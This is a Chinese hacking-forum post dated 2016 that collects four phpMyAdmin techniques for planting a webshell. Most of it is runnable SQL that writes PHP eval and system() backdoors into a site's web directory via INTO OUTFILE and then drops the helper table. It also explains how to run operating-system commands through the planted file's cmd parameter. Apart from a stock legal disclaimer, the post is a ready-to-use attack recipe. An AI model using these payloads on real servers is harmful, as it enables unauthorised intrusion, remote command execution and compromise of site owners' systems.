HanDs
管理员

[拿shell方法] 通过phpmyadmin各种技巧拿webshell方法汇总 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

第一种

  1. CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
  2. INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');
  3. SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/wniu.php';
  4. DROP TABLE IF EXISTS `darkmoon`;

(这种方法是最为常见的成功率也比较高,懂sql语句的朋友一眼就应该可以看懂什么意思)

以上代码意思就是选择musql数据库 然后建立一个darkmoon的表然后加入一个名字为darkmoon1的字段

然后在darkmoon1的字段中插入一句话代码

然后从darkmoon1字段里面导出一句话到d:/wamp/www/wniu.php 的文件名(这里的路径就是网站的程序路径)

最后就是删除darkmoon这个表。

第二种方法

  1. Create TABLE moon (darkmoon text NOT NULL);
  2. Insert INTO moon (darkmoon) VALUES('<?php @eval($_POST[pass]);?>');
  3. select darkmoon from moon into outfile 'd:/wamp/www/wniu.php';
  4. Drop TABLE IF EXISTS moon;

以上方法原理基本与方法一致

第三种方法:

  1. select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/wniu.php'

第四种方法

  1. select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/wamp/www/wniu.php'

不同之处在于导出成功后可以直接执行DOS命令(只要权限够大)

使用方法:www.xxx.com/wniu.php?cmd= (cmd=后面直接执行dos命令)

以上4种方法一般情况下足够拿到网站的webshell权限了。

如果你知道网站的物理路径的话可以尝试一下方法或者网站的物理路径。


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
通过 p hp my ad mi n 各种 技巧 w eb sh el l 方法 汇总
#1楼
发帖时间:2016-7-23   |   查看数:0   |   回复数:0
游客组
快速回复